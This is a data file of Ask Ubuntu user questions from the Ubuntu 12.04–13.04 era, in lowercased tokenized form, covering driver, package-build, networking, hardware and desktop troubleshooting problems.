281350	netbeans 7.0.1 error on precise	today , i installed openjdk and netbeans packages on my ubuntu 12.04 notebook from the synaptic package manager to learn some java . javac ( compiler ) and jvm are working fine . however , when i add a jframe to my netbeans projec , i get this error inside the generated code itself : package org.jdesktop.layout does not exist . however , when i browse the netbeans installation at /usr/share/netbeans/7.x.x/platforms/modules folder , the said package does exist there . how do i tell netbeans to find the packages there ? the above package folder already exists in netbeans search path . i verified this from the tools= > netbeans platforms menu . update : i added a library reference to `` swing layout extensions '' . after that , the said errors went away , but the designer still does n't work ! ! it is stuck with a `` loading ... '' on the window and no controls could be drag-dropped .
281351	how to update a package in ubuntu-builder which requires system reboot ?	i am trying to create a customized ubuntu live cd using ubuntu-builder . i was following this perticular answer : how to customize live ubuntu cd ? if i try to update a package which requires system restart ( such as kernel ) in desktop-mode ( gui-mode ) using synaptic , it installs the package but then the session indicator turns red & says restart to complete update . but since its a virtual chrooted environment running on xephyr , i can not perform restart ( if i try it just hangs ) . so how do i perform a system restart within chroot to complete the update ?
281353	samsung ml-2165 - are there any installation problems on 12.04 or 12.10 ?	i am planning to buy one of these printers . the only thing i am afraid of is that it may not be compatible with ubuntu . is there anything to be worry about ? do you recommend them ? samsung ml-2165 samsung ml-2165w/see
281356	i can not find /usr/share/php5/php.ini-development file	i install lamp according this link . but i can not find /usr/share/php5/php.ini-development file . my php is php version 5.3.10-1ubuntu3.6 . apache is apache/2.2.22 ( ubuntu ) . i use ubuntu 12.04 amd64 . how to know which is used development or production . thanks $ ls /usr/share/php5/php.ini* -l -rw-r -- r -- 1 root root 68428 mar 11 22:44 /usr/share/php5/php.ini-production -rw-r -- r -- 1 root root 68105 mar 11 22:44 /usr/share/php5/php.ini-production.cli -rw-r -- r -- 1 root root 68107 mar 11 22:44 /usr/share/php5/php.ini-production-dist
281362	ubuntu 12.04 shutdown hanging	when trying to shutdown ubuntu 12.04 it shows the dialog box of shutdown but after clicking it nothing happen i have to click on the power button to shut down
281363	replace ubuntu unity launcher with dock	i know it is possible to disable/move unity launcher in ubuntu 11.10 , but what about 13.04 ? i would like to completely disable unity launcher and use some sort of dock , or move unity launcher to the bottom of desktop . is it possible to do so ? thanks .
281369	displayport out for 2560x1440 screen on macbook air ( mid 2012 )	i 've got a macbook air ( mid 2012 ) and i want to install ubuntu 12.04 on it and i 'd like to use it with a 2560x1440 samsung 27 '' led syncmaster s27a850t screen with a mini displayport to displayport cable , connected to the thunderbolt port . is that possible ? does the thunderbolt port work at all on the mba2012 ? ( i know linux does not support thunderbolt yet . ) is it even possible to connect the macbook air with ubuntu to a normal hd monitor ?
281370	unable to boot to live dvd on mac powerbook g4	my mac is really old . the hardware sucks , but so does the software . i want to install ubuntu 12.04 32-bit powerpc on it , but whenever i try to boot to the live dvd , by either holding c ' or option/alt ' , nothing happens , and it boots up as normal . by holding option/alt , i used to get a boot screen , but i do n't get that now , when i started trying this dvd . how do i boot to a dvd ? it 's not working ! this is infuriating . computer specs : hardware : model name : powerbook g4 12 '' model identifier : powerbook6,4 processor name : powerpc g4 ( 1.1 ) processor speed : 1.33 ghz number of cpus : 1 l2 cache ( per cpu ) : 512 kb memory : 768 mb bus speed : 167 mhz boot rom version : 4.8.3f1 software : system version : mac os x 10.5.8 ( 9l30 ) kernel version : darwin 9.8.0 boot mode : normal
281371	how do i install qbittorrent 3.0.9 from the tarball ?	source tarball . i started with the instructions found in the `` install '' file found in the extracted tarball and after i typed ./configure after which i received the error : configuring qbittorrent ... verifying qt 4 build environment ... fail reason : there was an error compiling 'conf ' . see conf.log for details . be sure you have a proper qt 4.0 build environment set up . this means not just qt , but also a c++ compiler , a make tool , and any other packages necessary for compiling c++ programs . if you are certain everything is installed , then it could be that qt 4 is not being recognized or that a different version of qt is being detected by mistake ( for example , this could happen if $ qtdir is pointing to a qt 3 installation ) . at least one of the following conditions must be satisfied : 1 ) -- qtdir is set to the location of qt 2 ) $ qtdir is set to the location of qt 3 ) qtcore is in the pkg-config database 4 ) qmake is in the $ path this script will use the first one it finds to be true , checked in the above order . # 3 and # 4 are the recommended options . # 1 and # 2 are mainly for overriding the system configuration . i 'm running 12.10 ( 32 bit ) if it is relevant .
281373	audio no longer working after amd catalyst install , xubuntu 12.04	on a fresh xubuntu install today i installed fglrx-updates , fglrx-amdcccle-updates and fglrx-updates-dev and , after restarting , everything worked fine apart from audio . the volume indicator is greyed out and there are no sound options to be found anywhere . i installed pavucontrol and xfce4-mixer but neither of them will open , and every time i try to play a song , the music player ( i 've tried vlc and gmusicbrowser ) either freezes or sits at 0:00 . firefox hangs and eventually needs to be forced closed if i try to watch a video on youtube or elsewhere . lspci | grep audio returns the following : 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 01:00.1 audio device : advanced micro devices [ amd ] nee ati device aab0 edit : i 'm using a radeon hd 7750 card . i 'm not using the hdmi audio from it , but two speakers that are plugged into the port for the onboard audio .
281377	system freezes posibly because of google-chrome ?	i know there are similar questions , but none refer to the way i go about it . freezes are not regular and i ca n't reproduce them . when it does happen , it usually completely freezes for about 10 seconds ( sound glitches and no keyboard or mouse moves ) after which it comes back for 2-3 seconds and then it repeats . i usually get rid of this by alt+ctrl+f2 or f1 and issuing top and waiting for a chrome process that uses around 50 to 60 % of the processor to go down ( couple of seconds ) . other times the main process eating resources was clementine ( the music player ) but that was only around 30 % . after the process goes below 10 % i go back to ctrl+alt+f7 and it does n't make any more problems . how to solve this freeze ?
281382	running tf2 on ubuntu	i use ubuntu 12.04 with an old intel pentium cpu ( mobile intel gl40 ) and an intel gma 4500m onboard graphics card . i downloaded the linux-version of steam and tf2 via steam without using any kind of emulator or other programs . since i got an error message starting tf2 . i updated my graphics card driver . now i can start tf2 but i get strange graphics bug and cant play ( for example the valve intro is inversed combined with a strange green/black/blue pixel pattern - it is not playable although i have the feeling that i am in the main menu and hear the sound ) is there a way to play tf2 without an emulator or at least having to download the whole thing again ( windows version for example ) ?
281385	can dpkg obtain the source code of a package ?	apt-get source { some-package-name } gets the source code of that .deb . can this be achieved with dpkg instead ? or with software-center ?
281387	online-accounts not recognized by gnome-shell-google-calendar	hey everybody i 'm running ubuntu 13.04 , and everything works fine , except when i 'm trying to implement the gnome-shell-google-calendar according to this guide . it works , except that my online-accounts are not recognized ( although set up ) . please choose the account : none you have entered an invalid account number . please enter an integer . logging in as 'none ' ... error logging in as 'none' 'none ' may not be a gnome online account . a list of existing accounts is below . if you do not see a list of accounts , then you first need to add one . for more information , see http : //library.gnome.org/users/gnome-help/stable/accounts.html please choose the account : what 's the reason for that ?
281392	32 bit wine in 64 bit pc running ubuntu 64 bit precise	as i 'm using dotnet20 , i 've setup a wineprefix=~/.wine32 with winearch=win32 ( as per question 'installing dotnet2,0 on 64 bit machine ' ) . i saw in above question ( how to install 32 bit wine on 64 bit ubuntu ) that to use the `` wine 32 bit version '' permanently : sudo nano /etc/environment add the following line : winearch=win32 is this correct ? i would have thought that it would be best to also add wineprefix=~/.wine32 ?
281403	python 2.7 = > importerror : no module named _io	i decided to switch from windows to linux , so i installed ubuntu raring final beta . unfortunately i have a python problem . i was trying to use pip from a virtualenv i created , to install packages from a requirements.txt file like this : pip install -r requirements.txt i got the following error while a package was installing : buildutils/initlibzmq.c:10:20 : fatal error : python.h : no such file or directory compilation terminated . error : command 'x86_64-linux-gnu-gcc ' failed with exit status 1 i found on internet that to get rid of this , i should install the python-dev deb package : sudo apt-get install python-dev since i installed this package , i have the following error when i try to run a python : file : `` importerror : no module named _io '' . i use this python from the virtualenv : python 2.7.4rc1 ( default , mar 30 2013 , 15:39:28 ) [ gcc 4.7.2 ] on linux2 does anyone have an idea ? i ca n't find anything on google , and i really need to solve this issue in order to use ubuntu for my work ... thanks for your help . edit : it seems my virtualenv was corrupted for some reason . i uninstalled it . i recreated one , and performed the `` pip install -r requirements.txt '' again , and now i have this error : warning : failed to configure libzmq : /bin/sh : 1 : ./configure : not found staging platform.hpp from : buildutils/include_linux ************************************************ using bundled libzmq ************************************************ building 'zmq.libzmq ' extension creating build/temp.linux-x86_64-2.7/buildutils creating build/temp.linux-x86_64-2.7/bundled creating build/temp.linux-x86_64-2.7/bundled/zeromq creating build/temp.linux-x86_64-2.7/bundled/zeromq/src x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -ibundled/zeromq/include -ibundled -i/usr/include/python2.7 -i/usr/include/x86_64-linux-gnu/python2.7 -c buildutils/initlibzmq.c -o build/temp.linux-x86_64-2.7/buildutils/initlibzmq.o x86_64-linux-gnu-gcc -pthread -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -fpic -ibundled/zeromq/include -ibundled -i/usr/include/python2.7 -i/usr/include/x86_64-linux-gnu/python2.7 -c bundled/zeromq/src/ipc_address.cpp -o build/temp.linux-x86_64-2.7/bundled/zeromq/src/ipc_address.o x86_64-linux-gnu-gcc : error trying to exec 'cc1plus ' : execvp : no such file or directory error : command 'x86_64-linux-gnu-gcc ' failed with exit status 1 edit2 : the gcc error above can be fixed by installing the build-essential debian package . i ca n't answer my question yet ( need 7 more hours to do so ) , so i post the answer as en `` edit2 '' ...
281404	unity lost almost all shortcuts	i have a dell latitude e6530 laptop with nvidia video card that was working fine with the default video driver . after a normal package update ( ~1 week ago ) and a restart , boot resulted in a blank screen and i could run ubuntu only with safe mode . in safe mode all my `` cool '' shortcuts were disabled . i.e . ctrl+super+ leftkey ctri+super+ rightkey ctrl+alt+numpad [ 1379 ] super+w and alt+tab had a very flat design ( i think i was switched to unity2d ) i managed to restore normal boot by installing the nvidia driver ( nvidia-current ) and reinstalling x11 . however the shortcuts were not restored and i am still in unity 2d . i can not even see these shortcuts in the system preferences anymore so i am not sure if ubuntu decided to ditch them completely or i can restore them in another way
281409	`` failed to open vdpau backend libvdpau_nvidia.so '' error even though not using mplayer	i keep getting the following error message on my terminal : failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory i understand this has something to do with gnome mplayer , but afaik i 'm not using this program at all ! how can i fix whatever it is that is causing these messages ?
281419	turn off auto search in nautilus 3.8	does anyone know how to turn off the auto search in nautilus 3.8 . in previous versions when i pressed a key it would select the first item that started with that letter/key in directory i was in . now if i do this is automatically preforms a search as filters all items which is really annoying ( and slow ) . does anyone know how to turn this off and revert to the old behavior . i checked preferences but there 's nothing there .
281420	ca n't compile unity-greeter-13.04.1 on ubuntu 12.04	i downloaded the unity-greeter-13.04.1 from https : //launchpad.net/unity-greeter . now i want to compile it to able to install it on my ubuntu 12.04 . but i face below problems while compiling : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - hejar @ hejar-studio-1555 : ~ $ cd '/home/hejar/downloads/unity-greeter-13.04.1 ' hejar @ hejar-studio-1555 : ~/downloads/unity-greeter-13.04.1 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking whether gcc and cc understand -c and -o together ... yes checking for valac-0.18 ... no checking for valac-0.16 ... /usr/bin/valac-0.16 checking /usr/bin/valac-0.16 is at least version 0.15.1 ... yes checking whether to enable maintainer-specific portions of makefiles ... no checking whether make supports nested variables ... yes checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.16 ... yes checking for unity_greeter ... no ****configure : error : package requirements ( gtk+-3.0 gdk-x11-3.0 indicator3-0.4 liblightdm-gobject-1 > = 1.4.0 freetype2 cairo-ft libcanberra ) were not met : **** requested 'liblightdm-gobject-1 > = 1.4.0 ' but version of liblightdm-gobject is 1.2.3 consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables unity_greeter_cflags and unity_greeter_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . hejar @ hejar-studio-1555 : ~/downloads/unity-greeter-13.04.1 $ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - i tried sudo apt-get build-dep unity-greeter command then re-tried the ./configure but it did not work . even i tried the sudo apt-get install -- reinstall lightdm , then sudo apt-get install -- reinstall unity-greeter , and then sudo gedit /etc/lightdm/lightdm.conf and chnaged the code as `` greeter-session=unity-greeter '' and from terminal run sudo dpkg-reconfigure lightdm and from there choose `` lightdm '' as given in the forum http : //ubuntuforums.org/showthread.php ? t=2096409 . still stuck . can anybody help ? is there any command that can show me broken programs or packages ? is there a ppa for this to resolve ? actually i am not an expert and so far i got this : hejar @ hejar-studio-1555 : ~ $ wget https : //launchpad.net/ubuntu/+archive/primary/+files/lightdm_1.4.0.orig.tar.gz -- 2013-04-14 22:04:51 -- https : //launchpad.net/ubuntu/+archive/primary/+files/lightdm_1.4.0.orig.tar.gz resolving launchpad.net ( launchpad.net ) ... 91.189.89.223 , 91.189.89.222 connecting to launchpad.net ( launchpad.net ) |91.189.89.223|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //launchpadlibrarian.net/118426353/lightdm_1.4.0.orig.tar.gz [ following ] -- 2013-04-14 22:04:52 -- https : //launchpadlibrarian.net/118426353/lightdm_1.4.0.orig.tar.gz resolving launchpadlibrarian.net ( launchpadlibrarian.net ) ... 91.189.89.229 , 91.189.89.228 connecting to launchpadlibrarian.net ( launchpadlibrarian.net ) |91.189.89.229|:443 ... connected . http request sent , awaiting response ... 200 ok length : 660979 ( 645k ) [ application/gzipped-tar ] saving to : `lightdm_1.4.0.orig.tar.gz' 100 % [ ====================================== > ] 660,979 378k/s in 1.7s 2013-04-14 22:04:54 ( 378 kb/s ) - `lightdm_1.4.0.orig.tar.gz ' saved [ 660979/660979 ] hejar @ hejar-studio-1555 : ~ $ wget https : //launchpad.net/ubuntu/+archive/primary/+files/lightdm_1.4.0-0ubuntu2.diff.gz -- 2013-04-14 22:05:14 -- https : //launchpad.net/ubuntu/+archive/primary/+files/lightdm_1.4.0-0ubuntu2.diff.gz resolving launchpad.net ( launchpad.net ) ... 91.189.89.223 , 91.189.89.222 connecting to launchpad.net ( launchpad.net ) |91.189.89.223|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //launchpadlibrarian.net/119217989/lightdm_1.4.0-0ubuntu2.diff.gz [ following ] -- 2013-04-14 22:05:15 -- https : //launchpadlibrarian.net/119217989/lightdm_1.4.0-0ubuntu2.diff.gz resolving launchpadlibrarian.net ( launchpadlibrarian.net ) ... 91.189.89.228 , 91.189.89.229 connecting to launchpadlibrarian.net ( launchpadlibrarian.net ) |91.189.89.228|:443 ... connected . http request sent , awaiting response ... 200 ok length : 49509 ( 48k ) [ text/plain ] saving to : `lightdm_1.4.0-0ubuntu2.diff.gz' 100 % [ ====================================== > ] 49,509 105k/s in 0.5s 2013-04-14 22:05:17 ( 105 kb/s ) - `lightdm_1.4.0-0ubuntu2.diff.gz ' saved [ 49509/49509 ] hejar @ hejar-studio-1555 : ~ $ wget https : //launchpad.net/ubuntu/+archive/primary/+files/lightdm_1.4.0-0ubuntu2.dsc -- 2013-04-14 22:05:36 -- https : //launchpad.net/ubuntu/+archive/primary/+files/lightdm_1.4.0-0ubuntu2.dsc resolving launchpad.net ( launchpad.net ) ... 91.189.89.222 , 91.189.89.223 connecting to launchpad.net ( launchpad.net ) |91.189.89.222|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //launchpadlibrarian.net/119217991/lightdm_1.4.0-0ubuntu2.dsc [ following ] -- 2013-04-14 22:05:37 -- https : //launchpadlibrarian.net/119217991/lightdm_1.4.0-0ubuntu2.dsc resolving launchpadlibrarian.net ( launchpadlibrarian.net ) ... 91.189.89.228 , 91.189.89.229 connecting to launchpadlibrarian.net ( launchpadlibrarian.net ) |91.189.89.228|:443 ... connected . http request sent , awaiting response ... 200 ok length : 1806 ( 1.8k ) [ text/x-debian-source-package ] saving to : `lightdm_1.4.0-0ubuntu2.dsc' 100 % [ ====================================== > ] 1,806 -- .-k/s in 0s 2013-04-14 22:05:38 ( 15.3 mb/s ) - `lightdm_1.4.0-0ubuntu2.dsc ' saved [ 1806/1806 ] hejar @ hejar-studio-1555 : ~ $ tar xzf lightdm_1.4.0.orig.tar.gz hejar @ hejar-studio-1555 : ~ $ gunzip lightdm_1.4.0-0ubuntu2.diff.gz hejar @ hejar-studio-1555 : ~ $ patch -p0 < lightdm_1.4.0-0ubuntu2.diff patching file lightdm-1.4.0/debian/lightdm-session patching file lightdm-1.4.0/debian/lightdm.upstart patching file lightdm-1.4.0/debian/liblightdm-gobject-1-dev.install patching file lightdm-1.4.0/debian/lightdm.prerm patching file lightdm-1.4.0/debian/guest-account patching file lightdm-1.4.0/debian/source_lightdm.py patching file lightdm-1.4.0/debian/compat patching file lightdm-1.4.0/debian/copyright patching file lightdm-1.4.0/debian/lightdm.config patching file lightdm-1.4.0/debian/rules patching file lightdm-1.4.0/debian/changelog patching file lightdm-1.4.0/debian/liblightdm-gobject-1-doc.install patching file lightdm-1.4.0/debian/lightdm.pam patching file lightdm-1.4.0/debian/lightdm.postinst patching file lightdm-1.4.0/debian/lightdm.dirs patching file lightdm-1.4.0/debian/lightdm-greeter-session patching file lightdm-1.4.0/debian/lightdm.preinst patching file lightdm-1.4.0/debian/lightdm.install patching file lightdm-1.4.0/debian/lightdm.init patching file lightdm-1.4.0/debian/lightdm.templates patching file lightdm-1.4.0/debian/lightdm.lightdm-greeter.pam patching file lightdm-1.4.0/debian/liblightdm-gobject-1-0.symbols patching file lightdm-1.4.0/debian/liblightdm-qt-2-dev.install patching file lightdm-1.4.0/debian/gir1.2-lightdm-1.install patching file lightdm-1.4.0/debian/lightdm.postrm patching file lightdm-1.4.0/debian/control patching file lightdm-1.4.0/debian/watch patching file lightdm-1.4.0/debian/liblightdm-gobject-1-0.install patching file lightdm-1.4.0/debian/liblightdm-qt-2-0.install patching file lightdm-1.4.0/debian/lightdm.lightdm-autologin.pam patching file lightdm-1.4.0/debian/po/tr.po patching file lightdm-1.4.0/debian/po/sk.po patching file lightdm-1.4.0/debian/po/de.po patching file lightdm-1.4.0/debian/po/ca.po patching file lightdm-1.4.0/debian/po/it.po patching file lightdm-1.4.0/debian/po/ru.po patching file lightdm-1.4.0/debian/po/pl.po patching file lightdm-1.4.0/debian/po/pothead.in patching file lightdm-1.4.0/debian/po/da.po patching file lightdm-1.4.0/debian/po/eu.po patching file lightdm-1.4.0/debian/po/potfiles.in patching file lightdm-1.4.0/debian/po/ml.po patching file lightdm-1.4.0/debian/po/es.po patching file lightdm-1.4.0/debian/po/zh_cn.po patching file lightdm-1.4.0/debian/po/pt.po patching file lightdm-1.4.0/debian/po/cs.po patching file lightdm-1.4.0/debian/po/gl.po patching file lightdm-1.4.0/debian/po/ta.po patching file lightdm-1.4.0/debian/po/nl.po patching file lightdm-1.4.0/debian/po/templates.pot patching file lightdm-1.4.0/debian/po/fi.po patching file lightdm-1.4.0/debian/po/fr.po patching file lightdm-1.4.0/debian/po/ro.po patching file lightdm-1.4.0/debian/po/el.po patching file lightdm-1.4.0/debian/po/ja.po patching file lightdm-1.4.0/debian/po/sv.po patching file lightdm-1.4.0/debian/po/ko.po patching file lightdm-1.4.0/debian/po/pt_br.po patching file lightdm-1.4.0/debian/po/vi.po patching file lightdm-1.4.0/debian/patches/04_language_options.patch patching file lightdm-1.4.0/debian/patches/02_disable_tests.patch patching file lightdm-1.4.0/debian/patches/03_launch_dbus.patch patching file lightdm-1.4.0/debian/patches/09_lp577919-fix-chromium-launch.patch patching file lightdm-1.4.0/debian/patches/05_add_xserver_core_option.patch patching file lightdm-1.4.0/debian/patches/series patching file lightdm-1.4.0/debian/patches/01_transition_ubuntu2d_ubuntu_desktop.patch patching file lightdm-1.4.0/debian/patches/08_lp1059510.patch patching file lightdm-1.4.0/debian/source/format hejar @ hejar-studio-1555 : ~ $ cd lightdm-1.4.0 hejar @ hejar-studio-1555 : ~/lightdm-1.4.0 $ debuild dpkg-buildpackage -rfakeroot -d -us -uc dpkg-buildpackage : export cflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export cppflags from dpkg-buildflags ( origin : vendor ) : -d_fortify_source=2 dpkg-buildpackage : export cxxflags from dpkg-buildflags ( origin : vendor ) : -g -o2 -fstack-protector -- param=ssp-buffer-size=4 -wformat -wformat-security dpkg-buildpackage : export fflags from dpkg-buildflags ( origin : vendor ) : -g -o2 dpkg-buildpackage : export ldflags from dpkg-buildflags ( origin : vendor ) : -wl , -bsymbolic-functions -wl , -z , relro dpkg-buildpackage : source package lightdm dpkg-buildpackage : source version 1.4.0-0ubuntu2 dpkg-buildpackage : source changed by michael terry dpkg-source -- before-build lightdm-1.4.0 dpkg-buildpackage : host architecture amd64 dpkg-checkbuilddeps : unmet build dependencies : quilt libpam0g-dev gobject-introspection libgirepository1.0-dev gtk-doc-tools yelp-tools dpkg-buildpackage : warning : build dependencies/conflicts unsatisfied ; aborting . dpkg-buildpackage : warning : ( use -d flag to override . ) debuild : fatal error at line 1350 : dpkg-buildpackage -rfakeroot -d -us -uc failed hejar @ hejar-studio-1555 : ~/lightdm-1.4.0 $ could you explain how to install debuild from the package devscripts ?
281421	connection error when fetching update from software updater	i checked for updates and got an error stating : failed to download repository information , check your internet connection and the details : w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) /dists/quantal/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) /dists/quantal/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . i 'm running an oem laptop , 32 bit 1 gb ram . i looked at the settings and there was an option to add a cd-rom ?
281422	how to run skype with ubuntu 12.10	i have installed skype using the software center . i have the file on my desktop and i right clicked to see if i could run it as i had no icon and there is n't any way to run it ( i am new to linux ) and need help any suggestions ?
281425	how can i remove my current jdk and install default jdk ?	i have ubuntu 12.10 x64 installed on a virtual device ( vmware workstation ) on a host system windows 8 . i downloaded android source code . i wanted to build it , and it says : checking build tools versions ... ************************************************************ you are attempting to build with an unsupported jdk . you use openjdk but only sun/oracle jdk is supported . ************************************************************ i tried : sudo apt-get -y remove -- purge openjdk-7-jdk openjdk-7-jre and i still have openjkd 7 installed . how can i uninstall openjdk and install a jdk which could build android ?
281429	logitech k810 bluetooth keyboard fails to work after waking up from hibernate	i recently bought a logitech k810 keyboard for my laptop ( ubuntu 12.10 amd64 ) and set it up using the instructions found on a bug post for the device . in a new terminal type : hcitool scan and copy mac address xx : xx : xx : xx : xx : xx now in another terminal type : sudo hcidump -at you should get something like ( followed by a blinking cursor ) : hci sniffer - bluetooth packet analyzer ver 2.4 device : hci0 snap_len : 1028 filter : 0xffffffffffffffff switch back to your original terminal and type : sudo bluez-simple-agent hci0 xx : xx : xx : xx : xx : xx now in the hcidump terminal you will see a few things scroll past until you get something that looks like : 2013-02-07 15:35:40.653393 > hci event : user passkey notification ( 0x3b ) plen 10 bdaddr xx : xx : xx : xx : xx : xx passkey 66235 type the 'passkey ' in to the keyboard on the k810 and press enter on success you should get `` release '' and `` new device ( /org/bluez/ ... '' now set device as trusted : sudo bluez-test-device trusted xx : xx : xx : xx : xx : xx yes you might have a connection now , but still need to : sudo bluez-test-input connect xx : xx : xx : xx : xx : xx now reboot and hope for the best ! this works perfectly after a reboot , but just fails abysmally when i try to wakeup from hibernate . i then did research and found a workaround on another bug post by adding the following script to /etc/pm/sleep.d # ! /bin/bash # # disconnect any currently connected bluetooth device before suspending # works around : lp bug # 1075478 # # copyright : copyright ( c ) 2013 jamin collins # license : bsd # case `` $ { 1 } '' in suspend ) macs= $ ( /usr/bin/hcitool con | /usr/bin/awk '/acl/ { print $ 3 } ' ) # account for possibility of nothing being connected for mac in $ { macs } ; do /usr/bin/hcitool dc $ { mac } done ; ; resume ) esac this does nothing except crash the kernel or bluetooth . what can i do to make my keyboard automatically work when i resume from hibernate ? i am willing to reinstall the entire os if necessary as i am simultaneously dealing with optimus issues with hooking up a 27 inch dell monitor with 2560x1440 resolution .
281431	how to change administrator password ?	at the user accounts i set the password in the ( connection options ) at none then when i tried to unlock the user accounts it ask for a password , when i type the old one it says its wrong . i tried to change it in the recovery mode using these steps update drug open root type passwd i set a new password and it changed successfully when i logged in the administrator , it asked for a password for something for connection , i typed the old password it worked , then i tried to unlock the user accounts i tried both old and new password and nothing worked i use ubuntu 12.10
281436	can a 10-bit monitor connection preserve all tones in 8-bit srgb gradients on a wide-gamut monitor ?	this question is about color management and the use of a higher color depth , 10 bits per channel ( 30 bits in total , resulting in 1.07 billion colors , or 1024 shades of gray , sometimes referred to as `` deep color '' ) compared to the standard of 8 bits per channel ( 24 bits in total , 16.7 million colors , 256 shades of gray , sometimes referred to as `` true color '' ) . do not confuse with `` 32 bit color '' , which usually refers to standard 8 bit color with an extra channel ( `` alpha channel '' ) for transparency ( used to achieve effects like semi-transparent windows etc ) . the following can be assumed to be in place : 1 : a wide-gamut monitor that supports 10-bit input . further , it can be assumed that the monitor has been calibrated to its native gamut and that an icc color profile has been created . 2 : a graphics card that supports 10-bit output ( and is connected to the monitor via displayport ) . 3 : drivers for the graphics card that support 10-bit output . if applications that support 10-bit output and color profiles would be used , i would expect them to display images that were saved using different color spaces correctly . for example , both an srgb and an adobergb image should be displayed correctly . if an srgb image was saved using 8 bits per channel ( almost always the case ) , then the 10-bit signal path would ensure that no tonal gradients were lost in the conversion from the srgb of the image to the native color space of the monitor . for example : if the image contains a pixel that is pure red in 8 bits ( 255,0,0 ) , the corresponding value in 10 bits would be ( 1023,0,0 ) . however , since the monitor has a larger color space than srgb , sending the signal ( 1023,0,0 ) to the monitor would result in a red that was too saturated . therefore , according to the icc color profile , the signal would be transformed into a different value with less red saturation , for example ( 987,0,0 ) . since there are still plenty of levels left between 0 and 987 , all 256 values ( 0-255 ) for red in the srgb color space of the file could be uniquely mapped to color-corrected 10-bit values in the monitor 's native color space . however , if the conversion was done in 8 bits , ( 255,0,0 ) would be translated to ( 246,0,0 ) , and there would now only be 247 available levels for the red channel instead of 256 , degrading the displayed image quality . my question is : how does this work on ubuntu ? let 's say that i use firefox ( which is color-aware and uses icc color profiles ) . would i get 10-bit processing , thus preserving all levels of an 8-bit picture ? what is the situation like for other applications , especially photo applications like shotwell , rawtherapee , darktable , rawstudio , photivo etc ? does ubuntu differ from other operating systems ( linux and others ) on this point ?
281437	static wireless ip - can only access internet using ips	i am using lubuntu 12.10 as a local server and i am trying to get a static ip from my wireless network . i do n't have a problem connecting to the server , i can ssh and view webpages on the same network using 192.168.2.xx , and also with my external ip when on another network . i change the settings by : 1 . clicking on the wireless tab , selecting my network , and clicking edit . 2 . i then click the ipv4 tab and change dhcp to manual . 3 . i add an address : 192.168.2.xx , mask : 255.255.255.0 , gateway : 192.168.2.1 . 4 . i click save . my problem is i can not access the internet using domain names when on the lubuntu machine . i can ping google 's ip address , but not the domain name . the same thing happens in chromium . ping result : ping : unknown host google.com chromium result : error 137 ( net : :err_name_resolution_failed ) : unknown error . i change my network settings back to dhcp from manual and it works . i tried editing /etc/resolvconf/resolv.conf.d/base and adding nameserver 192.168.2.xx , but that did not help . i also tried adding the following to /etc/network/interfaces ( but have it commented out now ) auto wlan0 iface wlan0 inet manual my /etc/hosts and /etc/resolv.conf are empty . /etc/network/interfaces only has eth0 data in it .
281442	how can i programmatically determine if a system is a desktop or a server ?	is there any way to distinguish between ubuntu server and ubuntu desktop ? i have a bash script ( shameless plug ) that i use to set up lightweight web servers , and i 've noticed that when i run this script on my own computer , my ubuntu ( desktop ) install gets all messed up - i 'm pretty sure the culprit are the following lines of code : echo -e `` \e [ 1 ; 32mdave , i 'm removing the bloatware.\e [ 0m '' for halbox_package in apache2 bind9 nscd php portmap rsyslog samba sendmail ; do if [ [ -f /etc/init.d/ $ halbox_package ] ] ; then ( service $ halbox_package stop ) > /dev/null fi ( apt-get -qq -y remove -- purge `` $ halbox_package* '' ) > /dev/null 2 > & 1 done what i would like to do , is to detect whether the script is being ran in a server flavour or not , so i can decide whether to purge those packages or not . if it 's not possible to tell the flavors apart , can you tell me which package is necessary for ubuntu desktop to work properly ?
